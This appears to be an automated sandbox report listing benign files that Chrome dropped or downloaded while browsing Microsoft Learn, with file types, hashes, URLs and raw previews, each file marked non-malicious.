                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IfY.l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VfY.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VfY.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VfY.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............cp8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 6 12:39:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                            Entropy (8bit):3.9814396238015153
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:8h2dKOTqKdRbHuidAKZdA1vehDiZUkwqehNy+R:8UHJDy
                                                                                                                                                                                                                            MD5:8C57B668747002C748C6CF26A5C3D54F
                                                                                                                                                                                                                            SHA1:41282244AC97501E43132E0614A3B1B2847772CD
                                                                                                                                                                                                                            SHA-256:63C23003A953F38697BA7E76E14709D48A55E473C75B75751A9773234EFA2D90
                                                                                                                                                                                                                            SHA-512:3C0EE870D183904B35A8550672A9BD710FC7F012BD9AFDF69C0512479C681B7B72677F573AA748EAE068369E4D231FB0A82AFB838B3E0078A4034B1606DCCA62
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....Iz.MQ0..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IfY.l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VfY.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VfY.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VfY.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VfY.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............cp8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 6 12:39:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                            Entropy (8bit):3.9702779490651934
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:8432dKOTqKdRbHuidAKZdA1hehBiZUk1W1qeh/y+C:8ZH59fy
                                                                                                                                                                                                                            MD5:59344438C9910A27067893DA49F2753E
                                                                                                                                                                                                                            SHA1:EFAF09AFC9EC4B2924D9B81347C04A988A5CACF9
                                                                                                                                                                                                                            SHA-256:E5F21AADC8FD263EC97D5F7CD3CD17AC84B42717827C1543D3316863448113FE
                                                                                                                                                                                                                            SHA-512:97E95937ED0A42D3C6BFD3FFD3F31841676808E4B7D10BDC01E23B1AB0A3B519D3954115DBE19D997A60C467AC25853BD9CEF60D5543C74B8CE5CDC7C5F59B84
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....Q.+MQ0..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IfY.l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VfY.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VfY.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VfY.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VfY.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............cp8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Nov 6 12:39:28 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2683
                                                                                                                                                                                                                            Entropy (8bit):3.9814288727657705
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:8s32dKOTqKdRbHuidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbly+yT+:8sCHFT/TbxWOvTbly7T
                                                                                                                                                                                                                            MD5:471D85E0B74359A319653D86C465FB99
                                                                                                                                                                                                                            SHA1:4F5E1585A2A4A6D7B95C28E7B5739260CDF785FE
                                                                                                                                                                                                                            SHA-256:7239E95862F2196141E821A2476C567249B8544A611DEAF36083474B78B545D4
                                                                                                                                                                                                                            SHA-512:265DB6DEAA5D675A1550C6FA688C8B6C6FCCF85B032A132CE524A49463A397539E4870347CAE41BD1530F44A61892BA4D1003ABF2D2DC3A7BE6054ADF79F5353
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.......MQ0..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IfY.l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VfY.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VfY.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VfY.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VfY.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............cp8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):18477
                                                                                                                                                                                                                            Entropy (8bit):5.147347768532056
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                                            MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                                            SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                                            SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                                            SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):15427
                                                                                                                                                                                                                            Entropy (8bit):7.784472070227724
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                                                                            MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                                                                            SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                                                                            SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                                                                            SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):1478
                                                                                                                                                                                                                            Entropy (8bit):5.030941252322257
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
                                                                                                                                                                                                                            MD5:020629EBA820F2E09D8CDA1A753C032B
                                                                                                                                                                                                                            SHA1:D91A65036E4C36B07AE3641E32F23F8DD616BD17
                                                                                                                                                                                                                            SHA-256:F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
                                                                                                                                                                                                                            SHA-512:EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028616137/global/deprecation.js
                                                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1478
                                                                                                                                                                                                                            Entropy (8bit):5.030941252322257
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:TGAg3Efef6tfTf/fffCfxfdffW4N5f0f8fK8zyRWmmkYRWDKslbzP3LTPv4NUhqI:TK0W6bXnq512ysUbkfKCvUjeGxbu
                                                                                                                                                                                                                            MD5:020629EBA820F2E09D8CDA1A753C032B
                                                                                                                                                                                                                            SHA1:D91A65036E4C36B07AE3641E32F23F8DD616BD17
                                                                                                                                                                                                                            SHA-256:F8AE8A1DC7CE7877B9FB9299183D2EBB3BEFAD0B6489AE785D99047EC2EB92D1
                                                                                                                                                                                                                            SHA-512:EF5A5C7A301DE55D103B1BE375D988970D9C4ECD62CE464F730C49E622128F431761D641E1DFAA32CA03F8280B435AE909486806DF62A538B48337725EB63CE1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers...!(function () {...'use strict';...// Keep in sync with environment/browser.ts...var supportedBrowser =....typeof Blob === 'function' &&....typeof PerformanceObserver === 'function' &&....typeof Intl === 'object' &&....typeof MutationObserver === 'function' &&....typeof URLSearchParams === 'function' &&....typeof WebSocket === 'function' &&....typeof IntersectionObserver === 'function' &&....typeof queueMicrotask === 'function' &&....typeof TextEncoder === 'function' &&....typeof TextDecoder === 'function' &&....typeof customElements === 'object' &&....typeof HTMLDetailsElement === 'function' &&....typeof AbortController === 'function' &&....typeof AbortSignal === 'function' &&....'entries' in FormData.prototype &&....'toggleAttribute' in Element.prototype &&....'replaceChildren' in Element.prototype &&....// ES2019....'fromEntries' in Object &&....'flatMap' in Array.prototype &&....'trimEnd' in String.prototype &&....// ES2020..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
